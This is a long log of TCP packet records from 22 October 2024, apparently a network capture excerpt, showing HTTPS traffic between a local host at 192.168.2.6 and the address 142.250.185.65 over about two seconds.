                                                                                                                          Oct 22, 2024 16:11:57.761241913 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.761409998 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.818126917 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.818188906 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.818206072 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.818249941 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.818255901 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.818293095 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.818588018 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.818634033 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.818711996 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.818758011 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.823781013 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.823837996 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.823848963 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.823892117 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.833172083 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.833244085 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.833256960 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.833295107 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.877101898 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.877186060 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.877207994 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.877250910 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.877258062 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.877311945 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.933468103 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933546066 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933553934 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.933578014 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933592081 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.933617115 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933624029 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.933633089 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933670998 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.933682919 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933722019 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.939037085 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.939091921 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.939096928 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.939208984 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.939213037 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.939304113 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.939306974 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.939395905 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.960266113 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.960330963 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.960338116 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.960381031 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.991945028 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.992017031 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.992039919 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.992108107 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.992115021 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.992165089 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.048902988 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.048974037 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.048985958 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.049000978 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.049036980 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.049063921 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.050242901 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.050318003 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.054582119 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.054641008 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.054646015 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.054656029 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.054688931 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.054718018 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.054727077 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.054774046 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.065599918 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.065669060 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.065674067 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.065716028 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.107578039 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.107650995 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.107661009 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.107705116 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.164201021 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.164280891 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.164319992 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.164359093 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.164376974 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.164386988 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.164532900 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.164537907 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.164578915 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170006990 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170058012 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170063019 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170125961 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170125961 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170131922 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170181990 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170428991 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170475960 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170480013 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170538902 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170542955 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.170581102 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.180845976 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.180901051 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.180907965 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.180953979 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.222781897 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.222856045 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.222865105 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.222976923 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.279624939 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.279704094 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.279719114 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.279758930 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.279762030 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.279778957 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.279808044 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.279838085 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.285371065 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.285500050 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.285530090 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.285550117 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.285557032 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.285584927 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.285593987 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.285600901 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.285604954 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.285641909 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.296072960 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.296129942 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.296133041 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.296144009 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.296230078 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.356101036 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.356170893 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.356201887 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.356245041 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.394804001 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.395122051 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.395165920 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.395188093 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.395207882 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.395220995 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.395251989 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.395437956 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.395487070 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.400743008 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.400800943 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.400815010 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.401141882 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.401170015 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.401190042 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.401196003 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.401206017 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.401230097 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.401248932 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.411585093 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.411636114 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.412173986 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.412216902 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.471307993 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.471373081 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.471396923 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.471441031 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.510576010 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.510632038 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.510643005 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.510665894 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.510682106 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.510716915 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.510723114 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.510763884 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.516758919 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.516819000 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.516844988 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.516846895 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.516860008 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.516959906 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.516988993 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.516993999 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.517034054 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.517290115 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.517339945 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.517384052 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.517391920 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.517429113 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.527542114 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.527595997 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.527601957 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.527616978 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.527637959 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.527678013 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.586745977 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.586972952 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.587001085 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.587043047 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.626471996 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.626532078 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.626558065 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.626591921 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.626612902 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.626626015 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.626652956 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.631974936 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.632026911 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.632040024 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.632078886 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.632221937 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.632262945 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.632268906 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.632301092 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.632304907 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.632313013 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.632339001 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.632370949 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.632375002 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.632874966 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.633312941 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.633364916 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.633373976 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.633410931 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.642513990 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.642575979 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.642600060 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.642640114 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.642647028 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.642683983 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.702711105 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.702778101 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.702861071 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.702914000 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.742115021 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.742176056 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.742194891 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.742199898 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.742222071 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.742242098 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.742259026 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.742300987 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.747360945 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.747473001 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.747488976 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.747545004 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.747555017 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.747560978 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.747590065 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.747618914 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.747623920 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.747714996 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.747720957 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.747770071 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.748473883 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.748538017 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.748554945 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.748608112 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.758403063 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.758501053 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.758526087 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.758569002 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.758616924 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.758625984 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.758665085 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.818432093 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.818487883 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.818561077 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.818588018 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.818627119 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.857376099 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.857429028 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.857448101 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.857466936 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.857481956 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.857515097 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.857748985 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.857923031 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.863609076 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.863676071 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.863698959 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.863744020 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.863758087 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.863770008 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.863806963 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.863945961 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.863993883 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.863998890 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.864003897 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.864047050 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.864052057 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.866789103 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.873661995 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.873728037 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.873743057 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.873792887 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.873914957 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.873966932 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.874061108 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.874109983 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.874114990 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.874166012 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.874191999 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.874222040 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.874274969 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.282094002 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.282258987 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.290677071 CEST44349989142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:59.290802956 CEST49989443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:59.400973082 CEST44349989142.250.185.65192.168.2.6
